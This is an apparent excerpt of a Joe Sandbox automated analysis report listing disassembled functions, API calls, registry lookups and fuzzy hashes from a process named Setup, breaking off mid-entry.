                                                                                              • API ID: H_prolog3Process32$CloseCreateCurrentFirstHandleNextPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset_wcsnlen
                                                                                              • String ID:
                                                                                              • API String ID: 3082661801-0
                                                                                              • Opcode ID: ba9cd797fe303d8d195b2771051013c7bb4a2a9ac2e643577a3ab32486cfd9e3
                                                                                              • Instruction ID: f241fe7cf9b688b703ac7e2fac1f466ae47121f0a952457b2ef87ba6af62e5bd
                                                                                              • Opcode Fuzzy Hash: ba9cd797fe303d8d195b2771051013c7bb4a2a9ac2e643577a3ab32486cfd9e3
                                                                                              • Instruction Fuzzy Hash: 4391C171904208CFDB14DFBCC949ADDBBB5BF29328F144A59E050ABB81DB34D908DBA5
                                                                                              Function 6C90988C Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C909893
                                                                                              • GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C4412: __EH_prolog3.LIBCMT ref: 6C8C4419
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C53D4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000105,00000010,6C94EE70,?,?,?,?,6C90995C,00000000,?,UiInfo.xml,?,?,00000000), ref: 6C8C5412
                                                                                                • Part of subcall function 6C8C53D4: ExpandEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,6C90995C,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C8C5440
                                                                                              • PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$EnvironmentExpandPathStrings$AppendCommandFileLineModuleNameRelative
                                                                                              • String ID:
                                                                                              • API String ID: 168041992-0
                                                                                              • Opcode ID: 1ac61e5819073f6a6bb714b8e2553af46fe9081ea3f65de430aae9b088355679
                                                                                              • Instruction ID: 333653f6858c7f2915cd51a105850ee3d5059c49fc9b82d4323545f469cbacc2
                                                                                              • Opcode Fuzzy Hash: 1ac61e5819073f6a6bb714b8e2553af46fe9081ea3f65de430aae9b088355679
                                                                                              • Instruction Fuzzy Hash: E4416F31A0414DDFCF10DBF8C945AEEBBB5BF15318F244556E020A7B81CB38DA199766
                                                                                              Function 6C5D182C Relevance: 4.6, APIs: 3, Instructions: 109registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C5D2E5E,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D1897
                                                                                              • RegQueryValueExW.KERNEL32(6C5D2E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D18B3
                                                                                              • RegCloseKey.KERNEL32(6C5D2E5E,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D18D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: c18aad4c01f906f308bb027408cf7f2e8dbc514ab5bdf1f56b8aeb92e0874834
                                                                                              • Instruction ID: c0e78fed707a88cd83fbd6c9513eddcc314e9d7f13565e219b5fba9dd79265fb
                                                                                              • Opcode Fuzzy Hash: c18aad4c01f906f308bb027408cf7f2e8dbc514ab5bdf1f56b8aeb92e0874834
                                                                                              • Instruction Fuzzy Hash: 2831B231601385AFDB04DF59DC80E9B3BF9EB55359F56026AF920D6A61C330E984CB98
                                                                                              Function 6394F415 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6394F24C: GetDlgItem.USER32(?), ref: 6394F257
                                                                                                • Part of subcall function 6394F24C: SetWindowTextW.USER32(00000000,?), ref: 6394F286
                                                                                                • Part of subcall function 6394F24C: ShowWindow.USER32(00000000,00000005), ref: 6394F28F
                                                                                                • Part of subcall function 6394F24C: KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 6394F2AE
                                                                                                • Part of subcall function 6394F24C: ShowWindow.USER32(00000000,00000000), ref: 6394F2A5
                                                                                              • GetDlgItem.USER32(?,00003024), ref: 6394F479
                                                                                              • GetWindowLongW.USER32(00000000,000000EB), ref: 6394F484
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000001), ref: 6394F4C4
                                                                                                • Part of subcall function 6394F527: GetWindowPlacement.USER32(00000000,?,00000000), ref: 6394F550
                                                                                                • Part of subcall function 6394F527: SetWindowPlacement.USER32(00000000,0000002C), ref: 6394F561
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemLongPlacementShow$CallbackDispatcherTextUser
                                                                                              • String ID:
                                                                                              • API String ID: 3090988947-0
                                                                                              • Opcode ID: 15809a826bf49ac134bfb54a3b1863ac128e1f4ca28ef83d42a8c127cc005842
                                                                                              • Instruction ID: 615b97a68e75483917491d21314079541cc6d5ee766a8d53919022477036f84e
                                                                                              • Opcode Fuzzy Hash: 15809a826bf49ac134bfb54a3b1863ac128e1f4ca28ef83d42a8c127cc005842
                                                                                              • Instruction Fuzzy Hash: FE21293A2042059FCB10AF68C498D597BE5EF8A768B164294FD0ADF3A6CB31DC11CF81
                                                                                              Function 6395F5FD Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __recalloc$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 59120599-0
                                                                                              • Opcode ID: d9e941057cea9de26c270b2d0f7acce881c586e08e9fde84964bd1c5dff4bd8e
                                                                                              • Instruction ID: 765dc7a7ca6090ac073025d03c2b7288c534e7a08a6d910a214b081ab09b42c3
                                                                                              • Opcode Fuzzy Hash: d9e941057cea9de26c270b2d0f7acce881c586e08e9fde84964bd1c5dff4bd8e
                                                                                              • Instruction Fuzzy Hash: D1113C71502306DFE720DF68C980B59B7E4EB15A68F148828F9EACB350D731E8508F40
                                                                                              Function 6C8E76BB Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E76C2
                                                                                                • Part of subcall function 6C8E75C2: __EH_prolog3.LIBCMT ref: 6C8E75C9
                                                                                                • Part of subcall function 6C8E75C2: OpenFileMappingW.KERNEL32(00000002,00000000,00000000,?,6C8BAB18,00000008,6C8E76FE,?,?,00000004,6C90C454,?,6C8B95D4,00000000,00000001,?), ref: 6C8E75F2
                                                                                                • Part of subcall function 6C8E75C2: GetLastError.KERNEL32(?,?,?,?,00000001), ref: 6C8E75FF
                                                                                              • OpenEventW.KERNEL32(00100002,00000000,00000000,?,?,00000004,6C90C454,?,6C8B95D4,00000000,00000001,?,6C8BA794,?,00000001,?), ref: 6C8E770B
                                                                                              • OpenFileMappingW.KERNEL32(00000002,00000000,00000000,?,?,?,?,00000001), ref: 6C8E771B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$FileH_prolog3Mapping$ErrorEventLast
                                                                                              • String ID:
                                                                                              • API String ID: 1631330826-0
                                                                                              • Opcode ID: 562bb95a53687ee778a89e206030dbbbf779f192aa9e4e2a00045a9b34c0ba9d
                                                                                              • Instruction ID: 1c3b82b55755444003a0c204cd970c7610af3554cbead51639cff2b7574061cb
                                                                                              • Opcode Fuzzy Hash: 562bb95a53687ee778a89e206030dbbbf779f192aa9e4e2a00045a9b34c0ba9d
                                                                                              • Instruction Fuzzy Hash: 5F115EB1600306EFCB20CF64C942B99BBB0BF59314F108959F8589BB91C770E828CF94
                                                                                              Function 6C8CC406 Relevance: 4.5, APIs: 3, Instructions: 40registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC426
                                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C900F4A,00000004,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC43F
                                                                                              • RegCloseKey.KERNEL32(?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02F92298,00000004,6C900F4A,?), ref: 6C8CC44E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 62373634f74180bd9e5564859d3abaf7d0de082cefc96d3de27724e49c8802cc
                                                                                              • Instruction ID: 35fa1f3f3c50e5dddb3d3b08e70436f01dd0effa9ce91e8a464e77913e510b30
                                                                                              • Opcode Fuzzy Hash: 62373634f74180bd9e5564859d3abaf7d0de082cefc96d3de27724e49c8802cc
                                                                                              • Instruction Fuzzy Hash: BFF03C76200108FFEB10DFA5CC86EAE7B7DEF113A8F108215F91196290D775DE54AB61
                                                                                              Function 6C8C7CE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7CEF
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C7EE4: __EH_prolog3.LIBCMT ref: 6C8C7EEB
                                                                                                • Part of subcall function 6C8C5DD0: __EH_prolog3.LIBCMT ref: 6C8C5DD7
                                                                                                • Part of subcall function 6C8C5485: __EH_prolog3.LIBCMT ref: 6C8C548C
                                                                                                • Part of subcall function 6C8C5485: GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C8C7DAF,?,?,?,?,?,00000000,?,?,6C8BAB18,00000008,6C8C7CD9), ref: 6C8C549C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$HandleModule
                                                                                              • String ID: Unknown
                                                                                              • API String ID: 1530205010-1654365787
                                                                                              • Opcode ID: 0f3d658dc69fab1e30f65b08dd7e9c21148370536474c6510b1d6c6f18c19a61
                                                                                              • Instruction ID: 502e439a8f12afb97bbc0e569f03baa40eebe268146f2f459f0dbaa43fed34c9
                                                                                              • Opcode Fuzzy Hash: 0f3d658dc69fab1e30f65b08dd7e9c21148370536474c6510b1d6c6f18c19a61
                                                                                              • Instruction Fuzzy Hash: 0C316D716147099AD728DFB8C842BEBB3A4BF25314F504E2EA165C7BC0DB30E9089755
                                                                                              Function 6C8F4AD6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F4ADD
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$AppendPath_memcpy_s
                                                                                              • String ID: %TEMP%
                                                                                              • API String ID: 3727483831-235365282
                                                                                              • Opcode ID: 0a67a1915982974efc23656a9c2e08fcf36e13bfd280f0490b0a15d0a4eb66ae
                                                                                              • Instruction ID: f72710894f930d0cd6839d445a82c7a238efbe8d910d040837653858af096061
                                                                                              • Opcode Fuzzy Hash: 0a67a1915982974efc23656a9c2e08fcf36e13bfd280f0490b0a15d0a4eb66ae
                                                                                              • Instruction Fuzzy Hash: 2321713291010E9BCF10DBBCCA427EEB7B5AF21328F140A65E060EBBD5C774DA199751
                                                                                              Function 6C8D2677 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D267E
                                                                                                • Part of subcall function 6C8C89B7: __EH_prolog3.LIBCMT ref: 6C8C89BE
                                                                                                • Part of subcall function 6C8C89B7: __CxxThrowException@8.LIBCMT ref: 6C8C8A89
                                                                                                • Part of subcall function 6C8D2811: __EH_prolog3.LIBCMT ref: 6C8D2818
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: ReturnCode
                                                                                              • API String ID: 2489616738-1214168914
                                                                                              • Opcode ID: 32ee4683ec2d760e36b23cba43af05465d7c354d5b90af1524107f131affc804
                                                                                              • Instruction ID: e51ecc36eb919647dc8e9cea96ce51b367decc93c31c2bdcf3497655d4e04597
                                                                                              • Opcode Fuzzy Hash: 32ee4683ec2d760e36b23cba43af05465d7c354d5b90af1524107f131affc804
                                                                                              • Instruction Fuzzy Hash: F621A1B0510215DFCF20CFACC981A9E7BA8BF19718B14895AF424DF785C770D914CBA0
                                                                                              Function 6C90A11D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: %TEMP%
                                                                                              • API String ID: 431132790-235365282
                                                                                              • Opcode ID: 02fa29a427c351ee56b8c9c44297d7c84a84fb8bf18edd1e6f01c7859527a175
                                                                                              • Instruction ID: 2e63aa7ae448d2b52c80fad4db4e4cb0bb2aa39f77565d12d3e0f3ae27d49c90
                                                                                              • Opcode Fuzzy Hash: 02fa29a427c351ee56b8c9c44297d7c84a84fb8bf18edd1e6f01c7859527a175
                                                                                              • Instruction Fuzzy Hash: 85214271610219AFDF00DFA0CD49AEE7775FF14319F104524F921AAA90CB74DA15DBA4
                                                                                              Function 6C909293 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCommandLineW.KERNEL32(38D98A99,6C8F831D,?,00000000,6C934C14,000000FF,?,6C8F7793,?,00000000), ref: 6C9092BF
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandLine
                                                                                              • String ID: repair
                                                                                              • API String ID: 1384747822-2397320225
                                                                                              • Opcode ID: 3933ee0195a7ad5b1f99a7637240fe043034749be286474ae0ef3f7d84a6742e
                                                                                              • Instruction ID: 22a905d00ef30c69d6b32259f217806c05f6f644272da679fa08e8a651956037
                                                                                              • Opcode Fuzzy Hash: 3933ee0195a7ad5b1f99a7637240fe043034749be286474ae0ef3f7d84a6742e
                                                                                              • Instruction Fuzzy Hash: 7D11B632658740ABC710DB58CD41BDAB3DCEB8A738F150E2EB96597AD0DB30E5448A82
                                                                                              Function 6394FF39 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowPlacement.USER32(?,?), ref: 6394FF6A
                                                                                                • Part of subcall function 639676EE: _calloc.LIBCMT ref: 6396770F
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8PlacementThrowWindow_calloc
                                                                                              • String ID: ,
                                                                                              • API String ID: 1982324250-3772416878
                                                                                              • Opcode ID: 3ec933395b5b2377952e2523a04e2f2daa64e470d8de8d5ab6a5a8d6922cad34
                                                                                              • Instruction ID: 8af9d671cb0da918a362311f4e212399892b4c4bebcc6f076ee2b53ab1db3b83
                                                                                              • Opcode Fuzzy Hash: 3ec933395b5b2377952e2523a04e2f2daa64e470d8de8d5ab6a5a8d6922cad34
                                                                                              • Instruction Fuzzy Hash: F0114C72905309AFDB00DFA8D88099EF7F9FB4A714B21442AE859E7200D730F940CFA0
                                                                                              Function 6C8C388B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Entering Function
                                                                                              • API String ID: 431132790-2002471330
                                                                                              • Opcode ID: b5a450b1e38a2570ba9ea04e2bc10f8741731c63668d3972b6cb73b2f0dd153a
                                                                                              • Instruction ID: 57125ae82b61c30876614350ac48f8afdd446e8fa3933b42985d67c87dbb04b4
                                                                                              • Opcode Fuzzy Hash: b5a450b1e38a2570ba9ea04e2bc10f8741731c63668d3972b6cb73b2f0dd153a
                                                                                              • Instruction Fuzzy Hash: 25F032356002019FDB20DF68C941B9DB7E0EF64714F10C809E885CBB14CB38EC60DB40
                                                                                              Function 6C8C38D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • exiting function/method, xrefs: 6C8C38EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
